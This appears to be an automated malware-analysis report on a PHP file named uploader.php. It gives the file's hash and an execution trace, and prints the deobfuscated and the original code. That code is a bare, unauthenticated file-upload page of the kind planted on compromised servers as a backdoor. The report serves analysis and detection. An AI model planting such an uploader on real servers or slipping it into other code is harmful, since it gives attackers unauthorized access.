PHP Malware Analysis

uploader.php

md5: e7aa95e6a59c8f89131ab44c924cea8c

Jump to: 

Screenshot
Attributes
Files

Input

Title

URLs

Deobfuscated PHP code
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php 
$uploaddir = '/tmp/';
// Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    print "<body bgcolor=#000></br></br><div\n\nalign=center><font size=5 color=#ff0000>uploaded successfully</font></body>";
} else {
    print "<body\n\nbgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !\n</font> <marquee> Acid </marquee> </body>";
}
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html><!--

Execution traces
data/traces/e7aa95e6a59c8f89131ab44c924cea8c_trace-1676261985.5989.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:20:11.496762]
1	0	1	0.000141	393528
1	3	0	0.000199	396472	{main}	1		/var/www/html/uploads/uploader.php	0	0
1		A						/var/www/html/uploads/uploader.php	9	$uploaddir = '/tmp/'
2	4	0	0.000246	396472	basename	0		/var/www/html/uploads/uploader.php	10	1	NULL
2	4	1	0.000259	396536
2	4	R			''
1		A						/var/www/html/uploads/uploader.php	10	$uploadfile = '/tmp/'
2	5	0	0.000289	396472	move_uploaded_file	0		/var/www/html/uploads/uploader.php	11	2	NULL	'/tmp/'
2	5	1	0.000303	396544
2	5	R			FALSE
1	3	1	0.000317	396472
			0.000342	314352
TRACE END   [2023-02-13 02:20:11.496991]


Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml"><head></head><body bgcolor="white">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;


<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Avinash Kumar Thapa</title>


<br><br><div align="center"><font size="5" color="#ff0000Error" !="" <="" font=""> <marquee> Acid </marquee> <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file">&nbsp;
<input type="submit" value="Upload">
</form>
</div>

</font></div></body></html>
Original PHP code
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php
$uploaddir = '/tmp/'; // Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div

align=center><font size=5 color=#ff0000>uploaded successfully</font></body>';
} else { print '<body

bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !
</font> <marquee> Acid </marquee> </body>'; }
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html><!--